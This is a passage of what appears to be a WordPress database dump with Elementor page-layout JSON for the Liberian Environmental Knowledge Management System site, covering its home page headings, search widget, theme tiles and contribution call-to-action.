EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(6116,553,'_elementor_version','2.7.5'),(6117,553,'_elementor_template_type','wp-page'),(6118,553,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(6120,554,'_wp_page_template','default'),(6121,554,'_elementor_edit_mode','builder'),(6122,554,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center 